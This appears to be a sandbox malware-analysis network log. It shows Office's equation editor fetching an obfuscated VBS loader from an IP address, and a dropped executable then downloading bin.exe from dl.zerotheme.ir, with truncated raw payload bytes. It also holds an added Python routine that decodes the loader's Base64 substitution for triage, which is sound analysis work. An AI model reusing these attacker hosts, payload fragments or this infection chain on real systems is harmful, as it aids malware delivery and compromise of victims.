                                              Sep 27, 2024 10:57:09.818453074 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818453074 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818484068 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.818770885 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:09.819777012 CEST49167443192.168.2.22185.18.213.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 10:57:05.844036102 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2024 10:57:05.851135969 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 10:57:05.844036102 CEST | 192.168.2.22 | 8.8.8.8 | 0x4506 | Standard query (0) | dl.zerotheme.ir | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 10:57:05.851135969 CEST | 8.8.8.8 | 192.168.2.22 | 0x4506 | No error (0) | dl.zerotheme.ir | | 185.18.213.20 | A (IP address) | IN (0x0001) | false

• dl.zerotheme.ir
• 185.235.137.223
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 185.235.137.223 | 80 | 3340 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:57:02.185199976 CEST | 333 | OUT | GET /90/seethedifferentofpicture.vbs HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.235.137.223
Connection: Keep-Alive
Sep 27, 2024 10:57:02.803174019 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:57:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Thu, 26 Sep 2024 05:31:01 GMT
ETag: "1690f-622ff0b443a84"
Accept-Ranges: bytes
Content-Length: 92431
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-vbscript
                                              Data Raw: 27 20 4d 61 69 6e 20 73 63 72 69 70 74 20 6c 6f 67 69 63 20 66 6f 72 20 70 72 6f 63 65 73 73 69 6e 67 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 64 61 74 61 0d 0a 0d 0a 27 20 49 6e 69 74 69 61 6c 69 7a 65 20 74 68 65 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 64 20 73 74 72 69 6e 67 20 28 70 6c 61 63 65 68 6f 6c 64 65 72 29 0d 0a 44 69 6d 20 65 6e 63 6f 64 65 64 42 61 73 65 36 34 53 74 72 69 6e 67 0d 0a 65 6e 63 6f 64 65 64 42 61 73 65 36 34 53 74 72 69 6e 67 20 3d 20 22 29 29 3b 3b 3b 71 51 40 40 40 40 4d 40 40 40 40 40 40 40 40 45 40 40 40 40 40 40 40 40 2f 2f 38 40 40 40 40 4c 67 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 51 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 67 40 40 40 40 40 40 40 40 40 40 34 66 75 67 34 40 40 74 40 40 6e 4e 49 62 67 2e [TRUNCATED]
                                              Data Ascii: ' Main script logic for processing Base64-encoded data' Initialize the Base64 encoded string (placeholder)Dim encodedBase64StringencodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                              Sep 27, 2024 10:57:02.803193092 CEST1236INData Raw: 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 49 40 40 40 40 40 40 43 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                              Data Ascii: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@CC@@@@@@Eg@@@@@@@@@@@@@@@@@@@@@@@@@@@@C50ZXh0@@@@@@@@GH4@@@@@@@@g@@@@@@@@g@@@@@@@@@@I@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@C@@@@@@G@@ucm;;;sb2M@@@@@
                                              Sep 27, 2024 10:57:02.803203106 CEST1236INData Raw: 67 40 40 4c 40 40 40 40 40 40 40 40 40 40 77 40 40 40 40 45 51 2e 2e 2e 2b 40 40 77 40 40 40 40 2e 2e 2e 40 40 6f 72 40 40 40 40 59 71 40 40 2e 2e 2e 4d 77 2e 2e 2e 51 2e 2e 2e 4c 40 40 40 40 40 40 40 40 2e 2e 2e 40 40 40 40 40 40 45 53 67 53 40
                                              Data Ascii: g@@L@@@@@@@@@@w@@@@EQ...+@@w@@@@...@@or@@@@Yq@@...Mw...Q...L@@@@@@@@...@@@@@@ESgS@@Q@@GFP4GDw@@@@...nNQ@@@@@@KK@@I...@@@@YoEgE@@...iUmFP4GDQ@@@@...nNQ@@@@@@KK@@4...@@@@YoX@@@@@@...goGK@@4@@@@@@Yl&&&gsHKGg@@@@@@Yl&&&o@@E@@@@@@EKg@@DM@@k@@...w@@
                                              Sep 27, 2024 10:57:02.803212881 CEST1236INData Raw: 40 40 40 40 40 40 43 51 40 40 40 40 45 51 40 40 40 40 46 69 67 62 40 40 40 40 40 40 47 4b 45 73 40 40 40 40 40 40 59 40 40 49 47 6b 2e 2e 2e 40 40 40 40 40 40 6f 49 67 40 40 40 40 2e 2e 2e 69 67 58 40 40 40 40 40 40 47 40 40 40 40 44 65 26 26 26
                                              Data Ascii: @@@@@@CQ@@@@EQ@@@@Figb@@@@@@GKEs@@@@@@Y@@IGk...@@@@@@oIg@@@@...igX@@@@@@G@@@@De&&&go@@IM@@...@@@@@@oIg@@@@...iUm...ii2@@@@@@G&&&SYoc@@@@@@...iUmK...g@@@@@@Y@@@@N4@@KgEQ@@@@@@@@@@@@E@@ICE@@&&&hU@@@@@@EbM@@U@@ng@@@@@@@@o@@@@...E@@@@Cg7@@@@@@G&&&
                                              Sep 27, 2024 10:57:02.803224087 CEST1236INData Raw: 2e 2e 2e 71 49 6c 48 77 77 6f 47 77 40 40 40 40 2e 2e 2e 6e 35 52 40 40 40 40 40 40 4b 6f 69 55 66 45 43 67 62 40 40 40 40 40 40 47 40 40 36 49 6c 48 78 51 6f 47 77 40 40 40 40 2e 2e 2e 68 38 59 4b 2e 2e 2e 73 40 40 40 40 40 40 61 4d 2e 2e 2e 51
                                              Data Ascii: ...qIlHwwoGw@@@@...n5R@@@@@@KoiUfECgb@@@@@@G@@6IlHxQoGw@@@@...h8YK...s@@@@@@aM...Q@@@@@@aIM...xQIKCM...@@@@Yl&&&iYgkgQ@@@@Cgi@@@@@@G&&&SYoFw@@@@...g@@@@3iQN@@CD))...@@@@@@KCI@@@@@@Yl&&&gkotg@@@@...ihw@@@@@@G&&&SYoG@@@@@@...g@@@@3g@@q@@@@@@...E
                                              Sep 27, 2024 10:57:02.803234100 CEST1120INData Raw: 59 40 40 6f 47 66 67 55 40 40 40 40 40 40 51 44 47 3b 3b 3b 69 52 59 40 40 6f 44 47 6c 6a 2b 43 77 45 40 40 2e 2e 2e 68 63 76 43 78 70 46 40 40 51 40 40 40 40 40 40 50 62 2f 2f 2f 38 71 66 67 55 40 40 40 40 40 40 51 44 40 40 68 59 47 4b 46 6b 40
                                              Data Ascii: Y@@oGfgU@@@@@@QDG;;;iRY@@oDGlj+CwE@@...hcvCxpF@@Q@@@@@@Pb///8qfgU@@@@@@QD@@hYGKFk@@@@@@oq@@@@@@@@Ez@@F@@Fw@@@@@@@@O@@@@@@Rfgg@@@@@@Qt;;;...pF@@Q@@@@@@Pb///8XLQbQI@@@@@@...iZyjQ@@@@c@@oGKFI@@@@@@ol&&&gsoUw@@@@CiUm...xYHjmlv;;;@@@@@@CgooDg@@@@Ci
                                              Sep 27, 2024 10:57:02.803244114 CEST1236INData Raw: 59 4b 2e 2e 2e 69 6f 62 4d 40 40 51 40 40 75 40 40 40 40 40 40 40 40 2e 2e 2e 45 40 40 40 40 2e 2e 2e 45 43 4b 44 63 40 40 40 40 40 40 59 6c 26 26 26 67 6f 47 63 72 38 40 40 40 40 48 40 40 6f 38 51 40 40 40 40 2e 2e 2e 67 73 48 46 69 38 66 47 55
                                              Data Ascii: YK...iobM@@Q@@u@@@@@@@@...E@@@@...ECKDc@@@@@@Yl&&&goGcr8@@@@H@@o8Q@@@@...gsHFi8fGUU...@@@@@@@@9v///xct...t@@m@@@@@@G&&&gZy3w@@@@cCjx@@@@@@GCwcWLxMXRQE@@@@@@D2////fls@@@@@@Q))...d5m...x8PW@@sG...yj1@@@@@@GH24uFxtF@@Q@@@@@@Pb///8G...yj1@@@@@@G&&
                                              Sep 27, 2024 10:57:02.803253889 CEST1236INData Raw: 51 40 40 40 40 2e 2e 2e 48 34 4c 40 40 40 40 40 40 45 4b 45 4d 40 40 40 40 40 40 5a 2b 44 51 40 40 40 40 2e 2e 2e 2e 2e 2e 5a 71 4b 2e 2e 2e 73 2e 2e 2e 40 40 40 40 59 52 2e 2e 2e 53 69 77 40 40 40 40 40 40 47 26 26 26 53 59 29 29 43 68 45 4b 4b
                                              Data Ascii: Q@@@@...H4L@@@@@@EKEM@@@@@@Z+DQ@@@@......ZqK...s...@@@@YR...Siw@@@@@@G&&&SY))ChEKKF@@@@@@@@Yl&&&hMLEQooFwE@@...iUm&&&hEKK...c...@@@@Yl&&&ijl@@@@@@G&&&SY))D...EKKF@@@@@@@@Yl&&&ijl@@@@@@GEw0GKOk@@@@@@ZpEw4rNwYRDRYRCyj))@@@@@@G&&&SYmEQoRDRYRCxEMF
                                              Sep 27, 2024 10:57:02.803271055 CEST1236INData Raw: 43 69 55 6d 4b 44 49 40 40 40 40 40 40 6f 6c 26 26 26 67 6f 45 49 50 2f 2f 2f 77 40 40 7a 47 33 34 6d 40 40 40 40 40 40 45 45 77 30 53 44 51 4d 6f 58 77 40 40 40 40 43 69 55 6d 4b 47 40 40 40 40 40 40 40 40 6f 6c 26 26 26 67 77 72 4b 48 34 6d 40
                                              Data Ascii: CiUmKDI@@@@@@ol&&&goEIP///w@@zG34m@@@@@@EEw0SDQMoXw@@@@CiUmKG@@@@@@@@ol&&&gwrKH4m@@@@@@EEw4SDgMoXw@@@@CiUmfiY@@@@@@Q))DxIP...Che@@@@@@K&&&SYoYQ@@@@CgwIKPY@@@@@@Yl&&&gve@@yb+GgYgK@@Q@@@@G9i@@@@@@K&&&SY))E...Y))E))ir@@Q@@@@ER@@REZoN...29j@@@@@@K
                                              Sep 27, 2024 10:57:02.803282976 CEST1236INData Raw: 40 59 6d 4b 40 40 34 40 40 40 40 40 40 70 76 58 40 40 40 40 40 40 43 69 55 6d 46 70 70 76 58 51 40 40 40 40 43 69 55 6d 67 44 30 40 40 40 40 40 40 51 71 40 40 7a 40 40 26 26 26 40 40 40 40 63 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                              Data Ascii: @YmK@@4@@@@@@pvX@@@@@@CiUmFppvXQ@@@@CiUmgD0@@@@@@Qq@@z@@&&&@@@@c@@@@@@@@@@@@@@@@@@@@igk@@@@@@KKg@@bM@@c@@zQE@@@@...Y@@@@...F+PQ@@@@......MMEgwCKF4@@@@@@ooMg@@@@CgoEIP///w@@zLhdF@@Q@@@@@@Pb///8XLQbQM@@@@@@...iZ+PQ@@@@......MNEg0DKF8@@@@@@ol&&&i
                                              Sep 27, 2024 10:57:02.809614897 CEST1236INData Raw: 45 4b 67 40 40 40 40 40 40 7a 40 40 26 26 26 40 40 40 40 63 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 69 67 6b 40 40 40 40 40 40 4b 4b 67 40 40 62 4d 40 40 63 40 40 2b 77 45 40 40 40 40 2e 2e 2e 59 40 40 40 40 2e 2e 2e 46 2b 3b
                                              Data Ascii: EKg@@@@@@z@@&&&@@@@c@@@@@@@@@@@@@@@@@@@@igk@@@@@@KKg@@bM@@c@@+wE@@@@...Y@@@@...F+;;;@@@@@@......MMEgwCKF4@@@@@@ooMg@@@@CiUmCgQg////@@DMuHEU...@@@@@@@@9v///xct...t@@z@@@@@@G&&&n5U@@@@@@EEw0SDQMoXw@@@@CiUmKG@@@@@@@@ol&&&gwrKn5U@@@@@@EEw4SDgMoXw@
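The VBS body fetched by EQNEDT32.EXE above carries a PE as Base64 with part of the alphabet swapped out. Comparing the visible string with the standard Base64 of a DOS header (TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA) and of the stub banner (VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K followed by J for the "$" that ends the banner) shows "))" standing for T, ";;;" for V, "..." for B, "&&&" for J and "@@" for A. The Python below is an added example, not code from the report or from the sample, and the VBS's own decode routine is not shown on this page: the token table is inferred only from the fragments visible above, the decoder rejects any character it cannot map so an unseen token is reported rather than silently passed to the Base64 decoder, and the sample strings are constructed from those fragments.

```python
import base64
import re

# Substitution table inferred from the captured VBS body: each token on the left
# replaces one standard Base64 character. Only these five tokens are visible in
# the capture; anything else outside the Base64 alphabet is treated as unknown.
TOKENS = {
    "))": "T",
    ";;;": "V",
    "...": "B",
    "&&&": "J",
    "@@": "A",
}

_B64_ALPHABET = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)

# Longest tokens first so a three-character token is never split by a shorter match.
_TOKEN_RE = re.compile(
    "|".join(re.escape(t) for t in sorted(TOKENS, key=len, reverse=True))
)


def deobfuscate(obfuscated: str) -> str:
    """Map the custom tokens back to standard Base64 and refuse anything unmapped."""
    restored = _TOKEN_RE.sub(lambda m: TOKENS[m.group(0)], obfuscated)
    leftover = sorted(set(restored) - _B64_ALPHABET)
    if leftover:
        raise ValueError(f"unmapped characters in payload: {leftover!r}")
    return restored


def decode_payload(obfuscated: str) -> bytes:
    """Deobfuscate, pad to a 4-character boundary, and Base64-decode to raw bytes."""
    restored = deobfuscate(obfuscated)
    restored += "=" * (-len(restored) % 4)
    return base64.b64decode(restored, validate=True)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap triage: DOS 'MZ' magic plus the stub banner within the first 256 bytes (heuristic, my own)."""
    return blob[:2] == b"MZ" and b"This program cannot be run in DOS mode" in blob[:256]


# Constructed samples. The first is the opening of the string seen in the capture,
# written with an explicit repeat count for the run of "@"; the second is the
# DOS-stub banner fragment from the same capture, padded to a 3-byte boundary.
MZ_HEADER_FRAGMENT = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg" + "@" * 18 + "Q@@@@@@"
STUB_FRAGMENT = ";;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@"

if __name__ == "__main__":
    print(decode_payload(MZ_HEADER_FRAGMENT).hex(" "))
    print(decode_payload(STUB_FRAGMENT))
```

Because every token is built from characters that are not in the Base64 alphabet, the substitution is unambiguous and the order of replacement does not matter; the leftover check is what tells you when a sample uses a token this table does not know about.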


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49166 | 185.18.213.20 | 443 | 3584 | C:\Users\user\AppData\Local\Temp\temp_executable.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:57:07 UTC | 89 | OUT | GET /kokorila/cgl-bin/bin.exe HTTP/1.1
Host: dl.zerotheme.ir
Connection: Keep-Alive
2024-09-27 08:57:07 UTC | 207 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Thu, 26 Sep 2024 05:27:52 GMT
accept-ranges: bytes
content-length: 286208
date: Fri, 27 Sep 2024 08:57:07 GMT
                                              2024-09-27 08:57:07 UTC16384INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 17 50 af 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 4c 04 00 00 00 00 00 00 00 00 00 30 15 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00
                                              Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$y=`g=`g=`g:`g<`g<`gRich=`gPELPYL0`@
                                              2024-09-27 08:57:07 UTC16384INData Raw: 82 7a 3b 10 9f 97 53 0a 6b 45 5d b1 04 06 3b ca 23 c4 b1 63 4d 37 18 b7 40 c9 ce 82 ca 0a 99 92 9b c1 92 48 ab ad f2 93 e9 c1 7e 2f 98 4e 21 49 40 ae f9 49 7d da ac 13 4e a0 ab f4 10 30 64 ce 0f 4b 9d 1b ed 00 36 7a 08 95 5d 00 aa 28 35 e4 5a 42 a4 f5 83 c4 1b d1 5c 8e df f6 05 30 b6 c6 8b 75 d6 88 07 9f 53 9f 9b bd 1c 05 21 c6 5a ee a8 9b b4 45 e6 cd de bf 78 08 00 fe 99 16 8b d1 0e 35 e4 d7 91 41 e4 ef f7 1b df 30 ae dd 35 d0 21 8c f6 0b 4b ff dd 1d 99 ad 13 0e 8b 2c a9 d0 56 6e d4 bd 32 6f 26 0c 79 d3 f8 ec 7e 79 db b6 6a a8 92 c9 8a 59 e4 ab ac 25 eb db 55 a6 49 15 24 35 62 59 74 64 87 4b c5 d8 fe 31 fd 50 39 e8 e0 44 60 7d 8a 7b de 5f a9 e6 8c ca 7c f2 55 5b 78 12 88 aa 06 f6 06 3b 7a a2 79 d7 9a 59 8c 6b a8 80 e3 da 4e 31 0c 17 b3 de f7 00 42 b8 60
                                              Data Ascii: z;SkE];#cM7@H~/N!I@I}N0dK6z](5ZB\0uS!ZEx5A05!K,Vn2o&y~yjY%UI$5bYtdK1P9D`}{_|U[x;zyYkN1B`
                                              2024-09-27 08:57:07 UTC16384INData Raw: 47 b6 02 c6 fa 61 87 56 c2 2f a8 ac 65 92 ec ee a2 7e 1f 14 1f 31 5c 71 2b 86 50 26 84 e8 95 97 c4 ca 76 b2 9e 9b 63 33 59 12 62 dc 6f 3a 71 54 a4 ca e3 a0 a1 51 a0 19 4f 13 ca f5 f7 b1 ea 9a 6f db f0 fa dc 2b 3c de f5 ee 0c 6c 3a 80 41 2b 4e 65 96 2c be 59 a2 9b a5 20 3e 43 d9 84 a9 1f c0 c4 80 fa 6e 50 d0 0e 9e 34 ab c8 1c f8 80 21 33 48 f9 0d 1a 41 91 4b 8a 7f 47 be c1 71 6b 4b e7 7c 8a 2d b2 2e 00 e2 e2 3d e1 8e ce 2f 83 b0 9f 1b ea c3 45 2b 10 7c 23 34 41 eb e5 a6 22 d2 8a 0b 43 6f a5 0a e3 43 79 fe 30 4f cd 65 e1 e2 29 b7 e6 24 29 90 37 65 50 d1 59 61 b9 75 d2 91 6a 62 1f 69 0a 89 76 93 e7 f5 a5 a7 8e 46 d8 15 fa 02 1c 9a 22 45 d0 d6 36 69 b6 cf 44 ce ac 9a 9b c3 cf 2a 3b 39 7b 5c bc 7c 0a f3 bc d2 7b dd 9b 61 90 0b 5f 92 d5 f5 8a 6f db 31 d4 b7 b2
                                              Data Ascii: GaV/e~1\q+P&vc3Ybo:qTQOo+<l:A+Ne,Y >CnP4!3HAKGqkK|-.=/E+|#4A"CoCy0Oe)$)7ePYaujbivF"E6iD*;9{\|{a_o1
                                              2024-09-27 08:57:07 UTC16384INData Raw: e6 61 cb a4 4a a8 0d 00 41 fb 98 4e 3f 72 48 c8 e7 1e 6e d5 9a 84 72 b5 21 7f 3b 24 22 1c 8f a6 58 39 8d 57 5e ee 2f d3 5e d7 2a b5 a8 ef 63 1c e4 05 f6 de bc d8 d1 ec c6 4c 87 14 28 ba a2 7b 4c d7 fe ed dd d2 3c 2c 67 ab 57 54 63 a9 be 27 c7 d5 45 65 47 c6 80 52 0d 1d 8b c8 78 d4 12 7d 86 24 0f b0 8e f9 aa a3 90 ae 58 15 f2 8c 9a 9a 99 70 5e 4f 9b 93 ce 4e 49 6c be f9 97 6d 67 43 04 62 54 30 0c 44 b2 9f 32 33 29 45 05 30 36 c6 ee 40 a4 a2 5a 9b f9 12 d5 ef 03 87 30 e9 ef 9f 3a be 52 85 d1 74 bf 8c 32 ee 32 74 30 0a ac df fa 2c 36 e3 14 81 6b 63 19 e0 79 d0 cd ec bd 53 88 79 62 7b 77 b3 12 50 ff 03 8f a6 8e 70 5f 86 e8 3b f2 13 3d b5 96 d1 73 38 00 94 10 87 1a 57 d0 1f be 89 9f d7 ba c8 c5 05 31 80 f6 d9 bd e8 df 28 4f de 47 74 d8 17 21 b3 03 19 d3 ff 83
                                              Data Ascii: aJAN?rHnr!;$"X9W^/^*cL({L<,gWTc'EeGRx}$Xp^ONIlmgCbT0D23)E06@Z0:Rt22t0,6kcySyb{wPp_;=s8W1(OGt!
                                              2024-09-27 08:57:07 UTC16384INData Raw: d8 dc c6 74 2f 65 f5 5f e9 a8 e7 37 7a e9 35 99 4d 27 c3 e8 50 88 99 fc f7 7d 12 f8 04 c1 3c 42 f4 d9 5c 86 3c 3f 80 f1 13 2f 9f 35 28 62 38 50 5a 66 1b f3 57 07 ae 56 83 6f 10 6b 01 85 d2 03 b8 a0 3c 40 d9 9d 89 23 a4 b3 17 77 97 b8 53 cf 09 fb 87 5f 30 0b c8 e7 ec 5a f8 cd 95 59 95 0f ea 24 94 23 33 e0 f5 80 f2 5a ca fe ba c9 50 35 b8 51 da c0 fa 73 3d 5b ff 08 1c 90 4d b1 83 66 66 23 82 eb a6 28 ef f6 46 fd 73 10 61 e8 56 3b f2 7b 07 39 5f 49 c6 67 6c 4e 63 87 c6 60 c2 66 76 13 34 17 33 bf d0 5c bf 1b 3e 83 b3 82 a1 67 29 c7 c3 5d 0c a7 c1 46 06 1c 81 c8 47 b3 74 1b ab aa 67 c4 83 a7 6b eb ee 4d 02 b8 b1 f3 e5 ad 91 d5 3a a0 e8 70 50 8e c6 f6 37 7d 24 d4 ad 78 52 05 b9 d1 df 5d 3f da 42 f8 cd 48 8f 5b 42 0b 2a 28 d4 c2 77 1e 28 83 c6 18 0f 05 fc 8e 0f
                                              Data Ascii: t/e_7z5M'P}<B\<?/5(b8PZfWVok<@#wS_0ZY$#3ZP5Qs=[Mff#(FsaV;{9_IglNc`fv43\>g)]FGtgkM:pP7}$xR]?BH[B*(w(
                                              2024-09-27 08:57:07 UTC16384INData Raw: db 39 51 fa d2 db 4c e8 df 54 17 f3 63 16 b9 cb 11 45 56 6e 39 69 1e f4 9a 6c 24 fc 72 20 5e 34 7f 3d ff d8 5f e9 94 a3 fa 64 af 9f 42 25 35 13 3d 43 78 fb 51 ab 76 d3 62 82 dd e1 3c d8 c4 21 59 f1 d0 2a f6 c7 26 ef 61 cf c3 63 89 7b 53 d6 48 48 4d 67 62 41 85 9f e1 34 a2 50 fd e3 58 4e 4b 36 3d d7 b5 ff bc 32 b2 01 5a a9 93 1a cf 54 b3 be 40 d8 b2 e8 b2 a1 6a 37 a5 1a d6 6a ac 2f d9 e1 64 a0 41 21 94 c6 cc d4 6b 49 7e 68 3d 0e 57 48 69 75 e3 22 ee 16 f0 8a 96 87 e4 92 9d 1f 5e 74 b3 b2 4c 26 e7 cd c7 c1 c6 17 af 2b f2 78 8b 45 1e 28 b2 83 6d 5a c6 f1 b9 17 24 48 59 17 3b b3 f3 58 62 a7 dc 47 a2 33 39 aa 94 e8 c0 8e e2 a4 a2 30 f8 92 c5 51 98 a7 b3 de 96 5f f6 b2 38 75 e6 df 32 b1 9d a8 19 1a 59 a4 3d ef 20 ea 44 09 dc e4 17 6c 30 8d 91 c1 aa 91 d9 38 38
                                              Data Ascii: 9QLTcEVn9il$r ^4=_dB%5=CxQvb<!Y*&ac{SHHMgbA4PXNK6=2ZT@j7j/dA!kI~h=WHiu"^tL&+xE(mZ$HY;XbG390Q_8u2Y= Dl088
                                              2024-09-27 08:57:08 UTC16384INData Raw: af 51 55 28 42 0e 63 9d 55 f7 33 c7 7f 20 a7 6b 65 86 2b 11 70 e9 37 54 37 2b f0 59 1d d9 29 fc 37 b4 ea 67 a9 ec 77 94 29 72 c6 58 d4 a0 2f 4b df a0 a7 19 78 32 f1 4f c8 a0 34 23 4a 3d 50 95 19 76 b0 d2 22 2b 2f e1 e8 af 49 fb 2d c0 35 9b f2 66 fe da b3 27 1d 7f 91 e4 12 a8 00 d9 4d b8 ef bd 1a 14 b4 03 c5 72 32 a9 0b 7f d9 4f b1 72 50 cb a7 ec 5a 81 3a 7d b0 49 df c4 8a 38 c1 29 ee 0f f9 b0 db 2d b2 3d 4f 41 ba f5 20 b1 64 c8 e8 8a ab 2f de 8d b5 ba d4 a1 ab 1d 1d 21 fc 66 f6 f1 c0 6b 43 7b 22 b6 67 e3 6e 3b 1e 57 7b 79 9c 67 b4 79 61 91 a6 03 21 b3 f2 e3 c5 c6 dc 38 4a b2 ec 09 41 8d b8 74 0e 03 43 88 42 d8 8b 0d 3f 90 42 7b 66 da 9b e5 d2 a6 ff 84 df 52 8e bd fd 06 eb 07 57 ad 46 47 0f 8a c5 7b a8 b6 65 3d e4 6f de 6c eb bc 9b 08 1a 57 f9 77 f6 ac d4
                                              Data Ascii: QU(BcU3 ke+p7T7+Y)7gw)rX/Kx2O4#J=Pv"+/I-5f'Mr2OrPZ:}I8)-=OA d/!fkC{"gn;W{ygya!8JAtCB?B{fRWFG{e=olWw
                                              2024-09-27 08:57:08 UTC16384INData Raw: 55 fb 28 ea 05 41 42 0f 18 00 4f 0e 2c 8b c2 70 2a 15 ad f4 1b f8 30 fd f6 9d 71 a0 56 fd c7 4a 65 d1 9d f9 cb ca 6f 3e e7 b0 c5 34 64 e0 2f e1 12 71 27 0c 24 63 e0 0e 4d b2 4e 8a c2 cd 77 64 5f ef 30 95 fa db af 01 eb 32 56 9e c1 b5 5b e3 d8 14 22 56 bf f0 5d 2c e0 ee 34 48 54 af f3 de e8 49 74 08 d1 70 28 17 73 c7 d8 cc b9 94 d7 3b 27 08 9d 0a ac 17 ab 51 c0 59 26 f8 f0 ac 33 b6 78 18 07 be a0 f1 24 e6 e4 c1 85 c5 02 c9 63 bb 4b 50 1b 64 d0 e0 10 bf aa 78 2e 76 1a 5d 5f 62 14 8f 28 fc 02 13 12 c0 61 c8 5b b0 b1 6d 9d f6 fa 8b f0 2e 7e 17 0d 55 45 a7 b0 01 f7 f6 78 fb 9f 77 3e a3 8a d9 b4 f3 41 ec 37 25 36 46 bf d9 80 d2 ce 65 8c 84 00 46 58 b0 00 eb cd 8e c5 be 30 d1 0c e5 ab 09 ab 03 9d 79 3d f7 56 20 15 13 5e 6e 92 7c 80 e4 51 5b 20 04 02 db 1f 48 dc
